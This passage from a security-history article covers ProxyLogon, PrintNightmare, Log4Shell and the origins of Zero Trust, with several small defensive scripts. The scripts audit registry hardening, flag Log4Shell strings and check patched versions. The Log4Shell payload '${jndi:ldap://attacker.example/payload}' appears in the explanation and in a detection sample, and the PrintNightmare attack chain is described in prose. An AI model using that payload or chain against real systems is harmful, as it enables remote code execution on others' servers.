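        print(" -> ".join(route))
    for route in paths("Authenticated user", "SYSTEM-level RCE"):
        print(" -> ".join(route))
```

Enumerating from the unauthenticated starting point yields two routes, neither of which passes through CVE-2021-26857; that CVE only appears on the route that starts from an already-authenticated identity.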

Blast radius. Pre-patch numbers come from two separate primaries. Brian Krebs reported on March 5, 2021 that "at least 30,000" U.S. organizations had been compromised [@krebs-hafnium-march5]. Bloomberg's March 7 reporting placed the worldwide figure at "as many as 60,000" organizations [@krebs-hafnium-march5]. After Microsoft's March 2 patch shipped, the chain was widely weaponized by additional actor groups -- LuckyMouse, Tick, Calypso, Winnti, and others -- per ESET's March 10, 2021 enumeration of at least ten APT groups exploiting the same chain [@eset-exchange-10apt-2021]. The aggregate count of compromised servers ran toward 250,000 in the following weeks, per Krebs's contemporaneous reporting of hundreds of thousands of compromised Exchange servers worldwide [@krebs-hafnium-march5]. That 250,000 figure is widely cited, but it aggregates post-patch indiscriminate exploitation; it is not a pre-patch count. Microsoft attributed the original campaign to a Chinese state-sponsored actor it named HAFNIUM, later renamed Silk Typhoon under the weather-themed scheme in April 2023 [@msft-hafnium-blog, @ms-actor-naming-2023].

HAFNIUM became Silk Typhoon at the same April 18, 2023 rename pass that made Nobelium into Midnight Blizzard [@ms-actor-naming-2023]. Microsoft's threat-actor naming history matters because mid-cycle renames can fragment detection coverage; rules keyed on the old name will silently stop matching new advisories.
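A common mitigation for rename-driven gaps is to normalize actor names before matching. The sketch below is a minimal, hypothetical alias table covering only the names mentioned in this article; the dictionary and function names are illustrative and not taken from any vendor feed.

```python
# Alias sets limited to the names this article mentions.
ACTOR_ALIASES = {
    "Midnight Blizzard": {"UNC2452", "APT29", "Nobelium", "Midnight Blizzard"},
    "Silk Typhoon": {"HAFNIUM", "Silk Typhoon"},
}

# Reverse index: case-folded alias -> canonical name.
_CANONICAL = {
    alias.casefold(): canonical
    for canonical, aliases in ACTOR_ALIASES.items()
    for alias in aliases
}


def canonical_actor(name: str):
    """Return the canonical actor name for an alias, or None if unknown."""
    return _CANONICAL.get(name.strip().casefold())


def same_actor(a: str, b: str) -> bool:
    """True when both names resolve to the same known actor cluster."""
    left, right = canonical_actor(a), canonical_actor(b)
    return left is not None and left == right
```

A rule keyed on `canonical_actor(advisory_name)` keeps matching after a rename as long as the alias table is updated, which moves the maintenance burden from every rule to one lookup.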

Vendor response and federal action. Beyond the March 2 out-of-band patches, Microsoft released a one-click mitigation tool on March 8 and the Exchange On-premises Mitigation Tool on March 15. The Department of Justice and FBI then took an unprecedented step.

On April 13, 2021, the U.S. Department of Justice announced that the FBI had executed a court-authorized operation under Rule 41 of the Federal Rules of Criminal Procedure to access compromised on-premises Exchange servers in the United States, copy the attacker-installed web shells, and remove them -- without the system owners' prior consent or notification [@doj-fbi-rule41-pr, @hunton-fbi-rule41]. Owners were notified afterward.

The legal mechanism is worth pausing on. Rule 41, as amended in 2016, allows a single magistrate judge to authorize searches of computers whose location is unknown or whose location is in five or more judicial districts. The April 13 operation was the first major use of that authority to remediate third-party systems at scale, rather than to investigate. The precedent matters: every subsequent federal incident response that contemplates active intervention on private systems sits in the shadow of this order.

The architectural lesson is at the level of the product design. Exchange Server's front-end and back-end were specified to communicate over an authenticated trust boundary inside a single deployment. CVE-2021-26855 made the front-end act as the attacker's proxy into the back-end; the SSRF did not bypass the trust boundary so much as place the attacker on its server-side end and walk through it. On-premises server fleets that organizations control are still on the public internet, and the entry-point class is "the front-end proxy that pre-authenticates traffic for the back-end."

If the supply-chain class compromised the signed code on the endpoint, the on-premises server class compromised the boundary readers thought was between the endpoint and the internet. The third incident compromised the boundary inside the perimeter.

3.3 PrintNightmare: The Legacy SYSTEM Service on Every Domain Controller

On Patch Tuesday, June 8, 2021, Microsoft shipped a fix for CVE-2021-1675 [@msrc-cve-2021-1675] and labelled the vulnerability as an Elevation of Privilege in the Windows Print Spooler. Two weeks later -- with no announcement, no out-of-band advisory, and no community notification -- the MSRC entry was edited to add Remote Code Execution to the impact classification. Sangfor's Zhiniang Peng (@edwardzpeng) and Xuefeng Li (@lxf02942370) had reported the EoP behavior [@cube0x0-cve-2021-1675-gh]; the silent reclassification suggested an RCE primitive existed in the same surface that the June 8 patch had not closed. On June 29, believing the chain was now patched, Sangfor pushed a proof-of-concept to GitHub [@cube0x0-cve-2021-1675-gh, @cert-cc-vu-383432]. The repository was taken down within hours; copies preserved in forks (notably @cube0x0's Impacket port) became the artifact-of-record.

CERT/CC's Will Dormann reproduced the chain the next day and published Vulnerability Note VU#383432 with a sentence that the Windows operations community spent the rest of the week re-reading [@cert-cc-vu-383432]:

While Microsoft has released an update for CVE-2021-1675, it is important to realize that this update does NOT protect against public exploits that may refer to PrintNightmare or CVE-2021-1675. -- Will Dormann, CERT/CC VU#383432, June 30, 2021

On July 1, Microsoft assigned a new CVE -- CVE-2021-34527 -- for the broader RCE surface and acknowledged that it was "similar but distinct" from CVE-2021-1675 [@msrc-cve-2021-34527]. Out-of-band patches followed on July 6-7 for every supported Windows release, including unusual coverage for Windows 7 and Server 2008. On July 13, CISA issued Emergency Directive 21-04 ordering federal civilian agencies to apply the patches immediately and to disable or restrict the Print Spooler on Domain Controllers as a standing mitigation [@cisa-ed-21-04]. Microsoft followed with KB5005010 on July 14, documenting the supplementary Point-and-Print hardening required to close the residual surface [@kb5005010].

The Sangfor commit was preserved in forks because GitHub's fork model maintains each fork as an independent copy of the upstream repository's commit object graph, retained regardless of subsequent upstream deletion [@github-docs-about-forks]. The @cube0x0 fork [@cube0x0-cve-2021-1675-gh] became the de facto preserved artifact-of-record, with Sangfor's original authorship credited in the README. The story is a study in the asymmetry of disclosure timing: a vendor can take down a repository, but cannot retract the bytes that have already left.

PrintNightmare had a prior. Thirteen months earlier, on May 12, 2020, Alex Ionescu and Yarden Shafir published "PrintDemon" against the same service, the same SYSTEM context, and the same fundamental design assumption that PrintNightmare would expose more deeply [@printdemon-windows-internals]. PrintDemon (CVE-2020-1048) exploited the Spooler's printer-port abstraction: a printer port name was an opaque string the Spooler treated as a destination, and an unprivileged user could set the port name to an arbitrary file path. The Spooler would then write the print job bytes to that path -- with SYSTEM privileges -- producing arbitrary file write as SYSTEM through three PowerShell one-liners (Add-Printer, set port, Out-Printer) that any standard user could run. SafeBreach Labs' Peleg Hadar and Tomer Bar independently reported the same surface, reverse-engineered the May Microsoft patch, and presented related Spooler work at Black Hat USA 2020 [@cyberscoop-safebreach-spooler].

The design flaw is the same in both cases: the Spooler's RPC interface trusts caller-supplied strings (port names in PrintDemon; driver-package paths in PrintNightmare) without enforcing caller-side permissions on the file paths they resolve to. PrintDemon's primitive was arbitrary file write as SYSTEM. PrintNightmare's primitive was arbitrary code execution as SYSTEM via DLL load. The May 2020 to June-July 2021 progression is the canonical "expand the primitive" vulnerability-research arc -- same service, same trust assumption, incrementally more dangerous primitive.

| Dimension | PrintDemon (CVE-2020-1048) | PrintNightmare (CVE-2021-1675 / CVE-2021-34527) |
| --- | --- | --- |
| Disclosure | May 12, 2020 Patch Tuesday | June 8 (EoP), July 1 (RCE), July 6-7 OOB |
| Researchers | Ionescu, Shafir; SafeBreach Hadar, Bar | Sangfor Peng, Li; CERT/CC Dormann; @cube0x0 |
| Vulnerable RPC primitive | Printer-port name accepts arbitrary path | `RpcAddPrinterDriverEx` loads driver from UNC |
| Primitive class | Arbitrary file write as SYSTEM | Arbitrary code execution as SYSTEM |
| Caller privilege required | Standard local user | Authenticated domain user |
| Domain Controller impact | Local file-write only | Remote SYSTEM RCE on every DC running Spooler |
| Disclosure model | Coordinated, Patch Tuesday | Coordinated, then accidental PoC, then OOB |

PrintNightmare is the wider case of an attack class PrintDemon had already opened. The architectural lesson is that any primitive a researcher finds in a SYSTEM-privileged Windows RPC service should be treated as a signal that the broader surface needs review, not as a point-fix candidate.

The exploit chain. The Windows Print Spooler service (spoolsv.exe) runs as SYSTEM on every Windows machine and is enabled by default, including on Domain Controllers. The Spooler exposes two Remote Procedure Call interfaces (MS-RPRN and MS-PAR) used by clients to query printers, submit jobs, and install drivers. RpcAddPrinterDriverEx is the RPC method that installs a new printer driver. As shipped before July 2021, the method accepted a driver path specified as a UNC, fetched the driver file from that path, and loaded it into the Spooler process -- which runs as SYSTEM. An authenticated domain user could call RpcAddPrinterDriverEx against any reachable Spooler with the driver path pointing to an attacker-controlled share, and obtain SYSTEM execution in the target Spooler process. Domain Controllers running Spooler by default meant any authenticated domain user obtained SYSTEM on every DC. Domain compromise followed.

The MS-RPRN Print System Remote Protocol is the canonical Windows RPC interface for printer management. Per the Microsoft Open Specifications Appendix B Product Behavior, the earliest applicable Windows version is Windows NT 3.1 (1993). It exposes interfaces for printer enumeration, job management, and driver installation. Because Spooler hosts the interface and runs as SYSTEM, every reachable Spooler is a potential SYSTEM-level RPC endpoint. PrintNightmare exploited the `RpcAddPrinterDriverEx` method specifically; the related `RpcAsyncAddPrinterDriver` method is the asynchronous variant Dormann documented as the alternative entry point.

flowchart LR
    A[Domain user with credentials] --> B[RpcAddPrinterDriverEx call]
    B --> C[Print Spooler on Domain Controller]
    C --> D[Spooler fetches driver from UNC path]
    D --> E[Attacker SMB share with malicious DLL]
    E --> C
    C --> F[DLL loaded into spoolsv.exe as SYSTEM]
    F --> G[SYSTEM execution on Domain Controller]
    G --> H[Domain compromise]

PrintNightmare turned on a vendor practice that the disclosure community had not previously named as a primitive: a security advisory whose classification changed without notice. The June 8 publication of CVE-2021-1675 said EoP. The revision two weeks later said EoP and RCE. There was no out-of-band advisory, no email to affected administrators, no public callout. The reclassification was visible only to people who happened to revisit the MSRC page.

Sangfor's accidental PoC was, in a real sense, an artifact of the reclassification. The researchers believed the patched June 8 chain was the same chain they had reported and that the published patch covered their proof-of-concept. The change-without-notice meant the patch they were testing was incomplete and the demonstration they were publishing was live. The CERT/CC follow-up demonstrated the same point from the verifier side: a reproducer ran against a fully patched Windows Server 2019 Domain Controller and got SYSTEM.

The post-PrintNightmare disclosure-norms debate spent the next two years working through the implications. Should reclassifications trigger a fresh CVE assignment so the change has its own visible identifier? Should advisories carry change logs analogous to those on RFCs? Should vendors notify researchers credited for one CVE when the classification is broadened? MSRC's current practice has moved toward more transparent change tracking; the 2021 silent reclassification remains the canonical counterexample.

The architectural lesson is that the Windows attack surface still includes services dating from Windows NT 3.1, designed for a single-domain office LAN, running with SYSTEM-equivalent privileges on every Domain Controller by default. A silent vendor reclassification from EoP to RCE is itself an adversarial signal -- it is what leaks the technique.

Note: The defensible architecture for legacy Windows RPC surfaces is to constrain who can reach them and what privileges the host process holds when they are reached. Disabling Print Spooler on Domain Controllers (per CISA ED 21-04 [@cisa-ed-21-04]) and enabling the Point-and-Print restrictions in KB5005010 [@kb5005010] are the immediate hardening; the long-arc architectural answer is the same one that closes the ProxyLogon class, namely treating any service exposing RPC at SYSTEM as an internet-facing surface even when the network topology says otherwise.
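The Point-and-Print half of that hardening lends itself to a mechanical audit. The following is a minimal Python sketch, not Microsoft's tooling. It assumes the three registry value names that Microsoft's PrintNightmare guidance describes under `HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint` (`RestrictDriverInstallationToAdministrators`, `NoWarningNoElevationOnInstall`, `UpdatePromptSettings`) and the expected values shown in the comments; both should be confirmed against KB5005010 before use. The function name `audit_point_and_print` and the input dictionary are hypothetical: the dictionary stands in for values an inventory tool has already read from the registry.

```python
from typing import Mapping, Optional

# Assumed hardened state (confirm against KB5005010):
#   RestrictDriverInstallationToAdministrators == 1
#   NoWarningNoElevationOnInstall and UpdatePromptSettings absent or 0
# A value of None (or a missing key) means "not present in the registry".

def audit_point_and_print(values: Mapping[str, Optional[int]]) -> list[str]:
    """Return human-readable findings; an empty list means nothing was flagged."""
    findings = []
    # Conservative choice: an absent value is flagged, not assumed safe.
    if values.get("RestrictDriverInstallationToAdministrators") != 1:
        findings.append("RestrictDriverInstallationToAdministrators is not 1")
    for name in ("NoWarningNoElevationOnInstall", "UpdatePromptSettings"):
        if values.get(name) not in (None, 0):
            findings.append(f"{name} is {values[name]}, expected 0 or absent")
    return findings
```

A host that sets only `RestrictDriverInstallationToAdministrators` to 1 produces no findings under these assumptions; a host that sets `NoWarningNoElevationOnInstall` to 1 and nothing else produces two.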

If the supply-chain class compromised the signature and the on-premises server class compromised the perimeter, PrintNightmare compromised the inside of the trust boundary -- the Domain Controller itself. The fourth incident showed that even the boundary of the application stack was not a boundary.

3.4 Log4Shell: The Universal Library and the Transitive Dependency Graph

On November 24, 2021, Chen Zhaojun of Alibaba Cloud Security emailed the Apache Software Foundation with a vulnerability in Log4j 2.x: any message that the application logged, if it contained a ${jndi:...} substitution sequence, would trigger an outbound JNDI lookup [@log4j-apache-security]. On December 9, the bug surfaced in Minecraft Java Edition community channels -- which mattered because Minecraft's chat handler logs the messages players send. Within hours, LunaSec's Free Wortley, Chris Thompson, and Forrest Allison published the canonical writeup and coined the name "Log4Shell" [@lunasec-log4shell-gh]. Apache shipped Log4j 2.15.0 on December 10. CVE-2021-44228 was scored CVSS 10.0 [@nvd-cve-2021-44228]. On December 11, CISA Director Jen Easterly's official statement called Log4Shell a "severe risk" and "an urgent challenge to network defenders" [@cisa-easterly-statement-2021-12-11]. Two days later, on the CISA-convened national industry call, she went further: "one of the most serious I've seen in my entire career, if not the most serious" [@cyberscoop-easterly-2021-12-13].

CVE-2021-44228 was the moment "what versions of what library are in my fleet" stopped being a procurement question and became a federal-advisory question. -- Synthesis from CISA AA21-356A and the Apache Log4j security history

Why a Java library belongs in a Windows series. Log4Shell is not a Windows vulnerability. The bug is in Apache Log4j, a Java logging library, and the impact lands on any process that runs the affected Log4j versions and logs untrusted input. It belongs in this series because the exploitation with the greatest enterprise impact on Windows server fleets ran through Java applications hosted on Windows: Tomcat and JBoss application servers, VMware vCenter and Horizon, Atlassian Confluence and Jamf Pro on Windows hosts, Cisco enterprise products, Elasticsearch, and dozens of internal Java services running on Windows Server with embedded JREs. Microsoft's December 11, 2021 Security Blog post (with rolling updates through January 2022) documented Log4Shell exploitation against Windows-hosted Java fleets and the Defender for Endpoint detections built on top [@ms-log4j-guidance]; CISA's joint advisory covered the cross-platform exposure explicitly [@cisa-aa21-356a].

Java Naming and Directory Interface (JNDI). A Java API, first standardized in 1999, that provides a uniform interface for naming and directory services. JNDI is the abstraction layer between Java application code and back-end directory implementations -- LDAP, RMI, DNS, CORBA, and others. The Log4j 2.x message-pattern substitution feature evaluated `${jndi:...}` lookups by calling JNDI to resolve the named resource. If the JNDI URL pointed at an attacker-controlled LDAP server, the attacker could return a Java class reference, which the JVM would then download and instantiate -- executing arbitrary code in the application process.

The exploit chain. Any logged string that contained a ${jndi:ldap://attacker.example/payload} substitution caused Log4j to call out to the attacker's LDAP server. The server returned a Java class reference; the JVM dereferenced it, loaded the class over HTTP, and instantiated it. Arbitrary code execution followed under the JVM's identity. The exploitation primitive was extraordinarily compact: any place an attacker could get an attacker-controlled string into a logged event -- HTTP User-Agent, X-Forwarded-For, Minecraft chat, application form fields, log-event JSON, the username field of a failed authentication -- was an entry point.

sequenceDiagram
    participant Att as Attacker
    participant App as Java application on Windows
    participant Log4j as Log4j 2.x logger
    participant LDAP as Attacker LDAP server
    Att->>App: HTTP request, header contains JNDI lookup string
    App->>Log4j: logger.info incoming-request line
    Log4j->>Log4j: Message-pattern substitution evaluates the lookup
    Log4j->>LDAP: JNDI LDAP query to attacker host
    LDAP->>Log4j: Reference to attacker-hosted Java class
    Log4j->>LDAP: HTTP fetch of the class file
    LDAP->>Log4j: Bytecode payload
    Log4j->>App: JVM instantiates the class, runs constructor as the JVM identity
    Note over App: SYSTEM-level RCE on Windows hosts where the JVM ran as SYSTEM
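Because the entry point is any logged string, a defender's first triage step is often a scan of request fields and existing logs for the lookup syntax. The Python sketch below is deliberately naive and is offered only as an illustration. The function name `classify` and its three labels are hypothetical. The second pattern is an assumption about attacker behavior: nested lookups such as `${lower:j}` were widely reported as a way to hide the literal `jndi` string, so any nested `${` is flagged for human review, not treated as proof of an attack.

```python
import re

# Literal "${jndi:" in any letter case.
_JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)
# A "${" that opens inside another, still-unclosed "${".
_NESTED = re.compile(r"\$\{[^}]*\$\{")

def classify(field: str) -> str:
    """Label one logged field as 'jndi-lookup', 'nested-lookup', or 'clean'."""
    if _JNDI.search(field):
        return "jndi-lookup"
    if _NESTED.search(field):
        return "nested-lookup"
    return "clean"

for sample in (
    "${jndi:ldap://attacker.example/payload}",
    "${${lower:j}ndi:ldap://attacker.example/payload}",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
):
    print(classify(sample), "<-", sample)
```

A pattern match is a hunting aid only. The fix for the bug class is the library upgrade, because string filters of this kind are easy to evade.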

The Minecraft Java Edition leak vector mattered both for impact and for visibility. Java Edition's chat handler logs the messages players send. A player who typed a JNDI lookup into chat could trigger remote code execution on any server or client, including the player's own Minecraft client, that processed the chat through Log4j. The fastest public confirmation of the bug came not from a security researcher but from screenshots of Minecraft chat sessions, and the discovery propagated through the gaming community before the security industry had its first advisory out.

Blast radius. CVSS 10.0 is the maximum score the framework allows. At the same December 13 industry call, officials estimated that Log4Shell affected "hundreds of millions of devices" [@cyberscoop-easterly-2021-12-13]; the formal eight-agency joint advisory AA21-356A followed on December 22 [@cisa-aa21-356a]. The number was never an audited count; it was an order-of-magnitude estimate that combined Java's installed base (by the time of disclosure, Java ran on every major enterprise platform) with Log4j's adoption across the Java community (Log4j 2 is a transitive dependency of thousands of enterprise packages, often pulled in by chained dependency graphs that the application owner never explicitly chose). What the figure communicated -- accurately -- was that no one knew how many Log4j 2 instances existed in production.

Patch cascade. Log4j 2.15.0 (December 10) closed CVE-2021-44228 but did not fully eliminate the JNDI lookup primitive. 2.16.0 (December 14) closed CVE-2021-45046 by removing message lookups entirely. 2.17.0 (December 18) closed CVE-2021-45105, a denial-of-service in the same substitution path. 2.17.1 (December 28) closed CVE-2021-44832, an arbitrary-code-execution variant. The architectural lesson includes the "first patch did not actually fix it" story -- four CVEs and four patch releases over nineteen days to fully close a single bug class. Backports to the older 2.3.x and 2.12.x branches continued into January 2022.
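The cascade can be restated as a lookup from an installed version to the CVEs it still carries. The Python sketch below encodes only the four mainline releases named above. The names `FIXED_IN`, `parse`, and `still_open` are hypothetical, and the sketch makes two simplifying assumptions: it ignores the lower bound of each CVE's affected range, and it does not model the 2.3.x and 2.12.x backport branches, so it should not be applied to those lines.

```python
# Mainline 2.x release that closed each CVE, as listed in the text above.
FIXED_IN = {
    "CVE-2021-44228": (2, 15, 0),
    "CVE-2021-45046": (2, 16, 0),
    "CVE-2021-45105": (2, 17, 0),
    "CVE-2021-44832": (2, 17, 1),
}

def parse(version: str) -> tuple[int, ...]:
    """Turn '2.14.1' into (2, 14, 1), padding short versions with zeros."""
    parts = tuple(int(p) for p in version.split("."))
    return parts + (0,) * (3 - len(parts))

def still_open(version: str) -> list[str]:
    """CVEs from the cascade that `version` predates (mainline branch only)."""
    v = parse(version)
    return [cve for cve, fixed in FIXED_IN.items() if v < fixed]

for candidate in ("2.14.1", "2.15.0", "2.16.0", "2.17.0", "2.17.1"):
    print(candidate, still_open(candidate))
```

Under these assumptions 2.14.1 carries all four identifiers, each later release drops one, and 2.17.1 is the first release for which the list is empty.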

Software Bill of Materials (SBOM). A formal, machine-readable inventory of the components -- libraries, packages, embedded code, and dependencies -- that make up a software artifact. The two dominant standards are CycloneDX (OWASP, ECMA-424) [@cyclonedx-home] and SPDX (Linux Foundation, ISO/IEC 5962:2021) [@spdx-home]. EO 14028 made SBOM provision a federal procurement requirement [@eo-14028]; the SBOM debate the four incidents accelerated is whether SBOM data is most useful as a *prevention* tool (refusing to install software whose components fail policy) or as an *incident response* tool (answering "are we exposed?" in hours rather than weeks). Log4Shell was the first incident where the IR utility was operationally tested at scale.

Key idea: Universal libraries with deep transitive-dependency footprints are the new universal attack surface. "What versions of what library are in my fleet" was a question the typical enterprise could not answer in December 2021, and that gap is what accelerated SBOM from a policy document to operational tooling.
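With an SBOM in hand, the fleet question reduces to a search. The Python sketch below walks a CycloneDX-style JSON document and reports every component with a given name, including components nested inside other components. The sample document, the `billing-service` application, and the function name `find_component` are all hypothetical. The sketch assumes only the top-level `components` array and the per-component `name`, `version`, and nested `components` fields; the CycloneDX specification defines many more.

```python
import json

def find_component(sbom: dict, name: str) -> list[tuple[str, str]]:
    """Return (name, version) for every component called `name`, at any depth."""
    hits = []
    stack = list(sbom.get("components", []))
    while stack:
        comp = stack.pop()
        if comp.get("name") == name:
            hits.append((comp["name"], comp.get("version", "unknown")))
        # Components may embed their own sub-components.
        stack.extend(comp.get("components", []))
    return hits

# Hypothetical SBOM for an invented service; the values are illustrative only.
sample = json.loads("""
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.4",
  "components": [
    {"type": "application", "name": "billing-service", "version": "3.2.0",
     "components": [
       {"type": "library", "group": "org.apache.logging.log4j",
        "name": "log4j-core", "version": "2.14.1"}
     ]},
    {"type": "library", "name": "jackson-databind", "version": "2.13.0"}
  ]
}
""")

print(find_component(sample, "log4j-core"))
```

The nested hit is the point of the example: the invented application never lists Log4j at its top level, which is the transitive-dependency situation the incident exposed.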

Four incidents in thirteen months. Four assumptions broken. The next section asks what the prior-decade controls were actually doing that whole time.

4. Why Prior Art Did Not Catch Any of the Four

If the prior decade had quietly elevated four assumptions to invariants, the prior-decade controls had been quietly enforcing them. Here is what each one was actually doing during 2020-2021.

Endpoint EDR alone. The 2018-2020 industry consensus was that endpoint detection and response, plus a SIEM, plus a security operations centre, plus periodic threat hunting, constituted tractable defense-in-depth. The model worked against malware. It did not work against SUNBURST, because the binary that executed was the one EDR was specified to trust: signed by SolarWinds, on the approved publisher list, distributed via the customer's own patch-management pipeline. It did not work against ProxyLogon either, because the entry was an unauthenticated HTTPS request to a publicly reachable Exchange front-end, and the resulting web shell was an ASPX file served by w3wp.exe (the IIS worker process) -- not a malware drop. By the time EDR had behavioral telemetry on either case, the post-compromise phase was several steps along. Microsoft's own Digital Defense Report acknowledged the posture in plainer language: the industry had become competent at finding attackers after the fact, not at stopping them at first execution [@mddr-2021-specific].

Perimeter VPN and Network Access Control. The defense-in-depth posture of the 2010s assumed the inside of the corporate network was a higher-trust zone than the outside, accessed via a VPN concentrator on the boundary. BeyondCorp's 2014-2017 publication sequence had already named the assumption as architecturally wrong: the December 2014 Ward and Beyer paper [@ward-beyer-2014-usenix], the Spring 2016 Osborn et al. design-to-deployment paper [@beyondcorp-osborn-2016], the Winter 2016 Cittadini et al. access-proxy paper [@beyondcorp-cittadini-2016], the Summer 2017 Peck et al. migration paper [@beyondcorp-peck-2017], and the Fall 2017 Escobedo et al. user-experience paper [@beyondcorp-escobedo-2017] together document Google's transition off the privileged-intranet assumption and onto the public internet. SolarWinds did the empirical version of the same argument. The attacker was already inside the privileged-intranet zone, by virtue of a trusted vendor's signed update being a legitimate inhabitant of that zone. Anything the perimeter VPN was enforcing was being enforced against a population that did not include the attacker.

Patch Tuesday as the universal cadence. Microsoft's Patch Tuesday cadence -- the second Tuesday of every month, published at 10 AM Pacific Time -- was the assumed coordination point for the entire Windows defense industry [@ms-release-cycle]. Detection engineering, change management, scheduled-maintenance windows, and operator workflow all keyed on that monthly rhythm. Between March and August 2021, Microsoft issued multiple out-of-band emergency Exchange and Windows updates [@msft-hafnium-blog, @kb5005010]. The cadence's predictability -- the very property that scaled it to a global operator base -- was the property that made out-of-band patches feel like emergencies. The cadence broke under load not because the model was wrong but because the model assumed the load would not arrive in a sustained burst.

The clustering of out-of-band patches matters as a measured cadence-failure signal. Patch Tuesday absorbs routine load; it does not absorb a clustering of critical RCEs in Exchange Server and Print Spooler within four months (ProxyLogon was pre-authentication; PrintNightmare needed only an authenticated domain user). The 2021 cluster was a stress test on the cadence itself, and one of the post-incident operator complaints (from administrators of Domain Controllers required to reboot for the July 6-7 PrintNightmare OOB) was that the cadence's monthly rhythm had been training operations teams for a different threat model than the one 2021 produced.
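The cadence itself is simple calendar arithmetic, which makes "out of band" easy to test for. The Python sketch below computes the second Tuesday of a month and checks the release dates mentioned in this article against it. The function names `patch_tuesday` and `is_out_of_band` are hypothetical, and the sketch compares calendar dates only, ignoring the 10 AM Pacific publication time and any time-zone effects.

```python
from datetime import date, timedelta

def patch_tuesday(year: int, month: int) -> date:
    """Second Tuesday of the given month."""
    first = date(year, month, 1)
    # date.weekday(): Monday is 0, so Tuesday is 1.
    days_to_first_tuesday = (1 - first.weekday()) % 7
    return first + timedelta(days=days_to_first_tuesday + 7)

def is_out_of_band(release: date) -> bool:
    """True when a release date is not that month's Patch Tuesday."""
    return release != patch_tuesday(release.year, release.month)

print(patch_tuesday(2021, 6))              # the CVE-2021-1675 fix
print(is_out_of_band(date(2021, 7, 6)))    # first PrintNightmare OOB day
print(patch_tuesday(2021, 7))              # the regular July date
```

June 8, 2021 falls on the computed cadence date; July 6, 2021 does not, and the regular July date turns out to be July 13, the same day CISA issued ED 21-04.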

Note: All three prior-art positions -- endpoint EDR, perimeter VPN, monthly patch cadence -- assumed the trust boundary was knowable. EDR knew which binaries were trusted (the signed ones). The VPN knew where the boundary was (between the corporate LAN and the public internet). Patch Tuesday knew when updates would arrive (the second Tuesday of every month). The 2020-2021 cluster proved each boundary was something other than where the prior decade had placed it. The pivot was already on the shelf; it had just not yet become operative.

5. Zero Trust Was Already on the Shelf

There is a startling chronology fact here. NIST Special Publication 800-207, Zero Trust Architecture [@nist-sp-800-207], was published in August 2020. The Mandiant SUNBURST disclosure was December 13, 2020. Zero Trust was not a response to SolarWinds. It was the vocabulary already on the shelf when SolarWinds needed it.

The intellectual chain. Zero Trust is not a single document but a tradition with a thirteen-year arc. Four named milestones structure that arc.

In September 2010, John Kindervag, then at Forrester Research, published "No More Chewy Centers: Introducing the Zero Trust Model of Information Security" [@kindervag-2010-forrester, @isc2-15-years-zt, @illumio-15-years-zt]. The framing was network-segmentation-first and rhetorically unforgettable:

"Information security professionals must eliminate the soft chewy center by making security ubiquitous throughout the network, not just at the perimeter." -- John Kindervag, Forrester Research, "No More Chewy Centers," September 14, 2010

In December 2014, Rory Ward and Betsy Beyer of Google published "BeyondCorp: A New Approach to Enterprise Security" in USENIX ;login: magazine [@ward-beyer-2014-usenix]. The paper documented Google's transition from a privileged-intranet model to one in which every internal application was reachable on the public internet and every access decision was made on the basis of authenticated user and managed-device identity. A series of further BeyondCorp papers through 2017 worked out the engineering details. BeyondCorp is a production implementation of Zero Trust principles; it is not "the framework," and Ward and Beyer do not claim it is.

Between 2017 and 2018, Forrester elaborated the original framing into Zero Trust eXtended (ZTX), a seven-pillar taxonomy, and Gartner introduced CARTA -- Continuous Adaptive Risk and Trust Assessment -- as a complementary continuous-evaluation framing. ZTX gave the framework a procurement-friendly seven-pillar map; CARTA reframed access decisions as continuous rather than session-initial. Neither produced a complete architectural specification, which is the gap NIST SP 800-207 was published to fill in August 2020.

In August 2020, NIST published SP 800-207 [@nist-sp-800-207]. Authored by Scott Rose, Oliver Borchert, Stu Mitchell, and Sean Connelly, SP 800-207 synthesized Kindervag's framing, BeyondCorp's worked example, ZTX's taxonomy, CARTA's continuous evaluation, and federal Trusted Internet Connections (TIC) guidance into a vendor-neutral architecture. The architectural primitives the document names -- Policy Decision Point, Policy Enforcement Point, Policy Engine, and Policy Administrator -- became the load-bearing vocabulary for every subsequent Zero Trust treatment.

Zero Trust. An architectural orientation that refuses the assumption of a privileged inside network and decides every access on the basis of authenticated identity, device posture, and contextual signals at the moment of access. The term was coined by John Kindervag at Forrester in September 2010 [@kindervag-2010-forrester]. BeyondCorp [@ward-beyer-2014-usenix] is Google's production implementation, not the framework. NIST SP 800-207 [@nist-sp-800-207] is the vendor-neutral architectural specification. The Microsoft three-principle formulation ("Verify Explicitly, Use Least Privilege, Assume Breach" [@ms-zt-overview]) is *one* specialization of an older tradition; it is not the original.

Policy Decision Point (PDP) and Policy Enforcement Point (PEP). The two load-bearing primitives in NIST SP 800-207's Zero Trust architecture [@nist-sp-800-207]. The Policy Decision Point is the component that evaluates an access request against policy, user identity, device posture, and contextual signals and produces a decision. The Policy Enforcement Point is the component that intercepts the request and enforces the decision the PDP returns. In Microsoft's stack, Conditional Access [@ms-conditional-access] is the PDP for cloud-application access decisions; the resource (Exchange Online, SharePoint, a custom app) is the PEP. The PDP and PEP can be co-located or remote; the architectural distinction is the one that matters.

A common simplification reads NIST SP 800-207 as having "formalized BeyondCorp." This is the wrong shape of the chain.

NIST SP 800-207 explicitly references BeyondCorp as one production implementation of Zero Trust principles, alongside other implementations and prior architectural work. The document does not claim to be a formalization of BeyondCorp; it claims to be a vendor-neutral synthesis of multiple traditions, of which BeyondCorp is the most-cited production exemplar. The naming sequence -- "Zero Trust" 2010 by Kindervag, "BeyondCorp" 2014 by Ward and Beyer, "Zero Trust Architecture" 2020 by Rose et al. -- preserves the distinction.

The reason this matters is that "BeyondCorp" as a brand has become shorthand inside the Google-aligned engineering community for "the Zero Trust thing," while in the federal procurement community the relevant artifact is SP 800-207 itself. When the OMB M-22-09 federal Zero Trust strategy memo [@omb-m-22-09] cites a canonical reference, it cites SP 800-207, not BeyondCorp. The Microsoft three-principle formulation cites SP 800-207. CISA's Zero Trust Maturity Model cites SP 800-207. BeyondCorp is the worked example; SP 800-207 is the contract.

flowchart LR
    A[Kindervag Forrester 2010, No More Chewy Centers] --> B[Google BeyondCorp 2014 to 2017, USENIX login]
    B --> C[Forrester ZTX 2017 to 2018]
    A --> C
    A --> D[Gartner CARTA 2017 to 2018]
    C --> E[NIST SP 800-207 August 2020]
    D --> E
    B --> E
    E --> F[Microsoft three-principle 2021 to 2022]
    E --> G[EO 14028 May 2021 and OMB M-22-09 January 2022]
    G --> H[CISA ZTMM v2.0 April 2023]
